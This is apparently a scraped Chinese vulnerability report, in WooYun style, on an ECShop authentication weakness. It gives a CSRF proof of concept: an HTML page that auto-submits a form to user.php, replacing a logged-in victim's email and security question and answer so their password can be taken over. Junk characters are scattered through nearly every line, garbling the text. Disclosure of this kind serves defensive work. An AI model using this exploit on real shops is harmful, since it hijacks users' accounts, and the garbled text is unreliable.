简要描述:
% _! ~! ]8 M- d# q* Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
; v6 }4 `2 O% D* [. I
3 ^( V' l% i" O: T( iDemo For:http://www.wooyun.org/bug.php?action=view&id=395/ ~& ^0 ~5 u: b% g& a3 s# p
* V/ W" w& j7 p+ F% A+ T详细说明:8 T) `& N1 c) b$ b
利用csrf和xss可以突破官方所说的“障碍”
/ V2 y- x- m" c* ^. g' r% w% Exss版本已经有人说明
; G( X& V$ Y; z& s) u+ p这里给出csrf版本
& l1 @: C- h |5 B# U$ G0 u+ d
' C6 Z( |+ S9 u7 h漏洞证明:: V! `, X% {- k& N9 P) ?0 u
<html>
! i3 S/ n+ K l) e& A& W4 V<body>3 ?; N, q' N1 {+ z1 {2 \
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
2 P+ M" I! w! ?; H<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
W1 W) ?9 g3 s. {7 i- y& O. h1 ^<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 K: x2 _, l" j$ r0 L3 x
<INPUT TYPE="text" NAME="sel_question" value="ecshop">2 v p) e v' b; K# Y$ B
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">; g( E( b1 K% G# ?6 J$ x4 P
</body>. j B6 x7 P$ k9 f! Q
<script>3 x- T' n8 A5 O4 x) J
document.forms[0].submit();; u. s" _. Z L# m5 u
</script>
/ r# }, U: }( z3 p6 A</html>" Q9 R m# ?+ z: A8 [
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失0 F, v0 P( d8 N6 |
# v7 b* C+ j7 b4 d% p2 F |